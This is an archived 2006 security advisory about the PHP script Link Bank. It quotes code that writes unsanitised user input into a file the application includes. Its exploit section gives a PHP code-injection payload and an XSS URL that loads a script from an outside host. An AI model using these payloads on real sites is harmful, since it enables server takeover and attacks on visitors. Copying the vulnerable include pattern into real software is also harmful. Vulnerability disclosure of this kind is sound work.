link bank code execution and xss

2006-03-07T00:00:00
ID SECURITYVULNS:DOC:11723
Type securityvulns
Reporter Securityvulns
Modified 2006-03-07T00:00:00

Description

——– summary software: Link Bank vendors website: http://daverave.64digits.com/index.php?page=linkbank versions: n/a class: remote status: unpatched exploit: available solution: not available discovered by: retard risk level: high

——– description Link Bank does not sanatise post sumbited to it allowing users to insert data that can be used malisiously. after it is submited the data goes to a .txt file witch the application reads and executes to display the links submited. along with this it is vulnerable to xss due to the application not sanatising the variable again.

    in ./content/index.txt:

14 <?php 15 include("links.txt"); 16 ?>

    in ./content/add_link.txt:

2 $url_name = $_REQUEST['url_name']; 3 $url = $_REQUEST['url']; 4 $img = $_REQUEST['img']; 5 $filename = "content/links.txt"; 6 $code = "<a href = iframe.php?site=$url target=_blank>$url_name</a><br>";

    in ./iframe.php:

3 <title>Link Bank - <?php echo"$site";?></title>

——– exploit(s) code execution: submit something like <?php exec($cmd) ?> as a link name

    xss:

http://example.com/iframe.php?site=%3C/title%3E%3C/head%3E%3Cscript%20src=http://notlegal.ws/xss.js%3E%3C/script%3E

——– credit author(s): retard email: retard@30gigs.com